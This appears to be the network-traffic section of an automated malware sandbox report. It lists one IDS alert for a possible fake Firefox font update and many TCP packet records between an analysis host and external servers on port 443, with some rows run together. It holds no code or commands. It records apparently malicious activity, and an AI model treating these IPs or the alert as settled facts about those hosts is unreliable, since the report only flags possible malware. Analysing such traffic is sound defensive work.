| 2024-12-23T08:09:01.563690+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49780 | 52.217.67.100 | 443 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
                                                                                                                                                                              Dec 23, 2024 08:08:45.002495050 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.002612114 CET49731443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.002635002 CET44349731104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.208843946 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.208909988 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:45.209024906 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.209315062 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:45.209330082 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.420347929 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.420577049 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.421744108 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.421755075 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.421999931 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.424268007 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424387932 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424416065 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:46.424511909 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:46.424520016 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398555994 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398662090 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.398725033 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.399036884 CET49737443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.399070978 CET44349737104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.796571016 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.796622038 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:47.796736956 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.797204018 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:47.797214985 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.010258913 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.010535002 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.011769056 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.011799097 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.012377977 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.015605927 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.015705109 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.015718937 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789154053 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789264917 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:49.789340019 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.789449930 CET49743443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:49.789468050 CET44349743104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:50.289248943 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289303064 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:50.289383888 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289756060 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:50.289772987 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.511426926 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.511497974 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.512727976 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.512742043 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.512986898 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.520658016 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521334887 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521374941 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.521482944 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521517992 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.521867990 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.521902084 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.522840023 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.522872925 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523020029 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523041964 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523112059 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523122072 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523191929 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523215055 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523230076 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523236036 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523370028 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523386955 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.523406982 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523425102 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523890972 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.523926973 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571326971 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.571500063 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571523905 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:51.571541071 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:51.571547985 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208333015 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208439112 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.208507061 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:55.208708048 CET49751443192.168.2.10104.21.36.201
                                                                                                                                                                              Dec 23, 2024 08:08:55.208728075 CET44349751104.21.36.201192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.440680981 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.440752029 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:55.440845966 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.441217899 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:55.441232920 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.654555082 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.654674053 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.656274080 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.656290054 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.656572104 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:56.664520979 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.664551020 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:56.664633989 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453447104 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453552961 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453607082 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453784943 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453804016 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.453819036 CET49768443192.168.2.10172.67.199.72
                                                                                                                                                                              Dec 23, 2024 08:08:57.453824997 CET44349768172.67.199.72192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.630039930 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630084991 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:57.630155087 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630507946 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:57.630518913 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.223306894 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.223387003 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.226074934 CET49774443192.168.2.10185.166.143.48
                                                                                                                                                                              Dec 23, 2024 08:08:59.226089954 CET44349774185.166.143.48192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:08:59.226433992 CET44349774185.166.143.48192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 23, 2024 08:08:59.227785110 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.271332026 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.902856112 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.902937889 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.902983904 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.902997971 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.903084993 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.903156042 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.903156042 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.903181076 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.903194904 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:08:59.903204918 CET  49774        443        192.168.2.10     185.166.143.48
Dec 23, 2024 08:08:59.903208971 CET  443          49774      185.166.143.48   192.168.2.10
Dec 23, 2024 08:09:00.138204098 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:00.138253927 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:00.138372898 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:00.138705015 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:00.138719082 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:01.563600063 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:01.563689947 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:01.583667040 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:01.583688974 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:01.584794044 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:01.586081028 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:01.627334118 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.027543068 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.078444004 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.082437038 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082464933 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082494020 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082518101 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082526922 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082532883 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.082561016 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082592010 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.082601070 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.082662106 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.082669973 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.125308990 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.255670071 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.255701065 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.255744934 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.255769968 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.255800009 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.255814075 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.255820036 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.255832911 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.255867958 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.255875111 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.297168970 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.304497004 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.304518938 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.304562092 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.304563999 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.304585934 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.304613113 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.304622889 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.304635048 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.304672003 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.309464931 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.309542894 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.309590101 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.309598923 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.359690905 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.414139032 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.414153099 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.414212942 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.414232016 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444540024 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444583893 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444595098 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444629908 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444633961 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.444653034 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.444662094 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.444663048 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.470313072 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.470331907 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.470349073 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.470438004 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.470438004 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.470457077 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.496081114 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.496098995 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.496136904 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.496201038 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.496201038 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.496217966 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.496225119 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.547225952 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.614171028 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614182949 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614217043 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614227057 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614250898 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614296913 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.614350080 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.614370108 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.633440018 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.633450985 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.633471012 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.633482933 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.633517027 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.633553028 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.633569956 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.651170015 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.651190996 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.651233912 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.651266098 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.651278019 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.651285887 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.669054031 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.669075966 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.669105053 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.669301987 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.669316053 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688219070 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688231945 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688245058 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688268900 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688302994 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.688317060 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.688352108 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.706093073 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.706118107 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.706162930 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.706177950 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.706187010 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.706191063 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.706231117 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.723963976 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.723984003 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.724036932 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.724039078 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.724057913 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.724066019 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.724154949 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.804626942 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.804652929 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.804727077 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.804737091 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.804778099 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.804799080 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.804799080 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.818106890 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.818133116 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.818170071 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.818185091 CET  443          49780      52.217.67.100    192.168.2.10
Dec 23, 2024 08:09:02.818196058 CET  49780        443        192.168.2.10     52.217.67.100
Dec 23, 2024 08:09:02.830635071 CET  443          49780      52.217.67.100    192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830686092 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830703974 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.830717087 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.830754995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.832299948 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.832374096 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.842427015 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842444897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842514038 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.842525959 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.842588902 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.843986034 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853790998 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853807926 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.853893995 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.853914022 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860205889 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860228062 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860274076 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.860285044 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.860454082 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.866569996 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866610050 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866651058 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.866677046 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.866686106 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.906596899 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.906671047 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.953453064 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990235090 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990250111 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990282059 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990351915 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990372896 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990391970 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.990396023 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.990434885 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.996653080 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996674061 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996720076 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:02.996728897 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:02.996752024 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.003391027 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003429890 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003475904 CET49780443192.168.2.1052.217.67.100
                                                                                                                                                                              Dec 23, 2024 08:09:03.003504038 CET4434978052.217.67.100192.168.2.10
                                                                                                                                                                              Dec 23, 2024 08:09:03.003520012 CET49780443192.168.2.1052.217.67.100
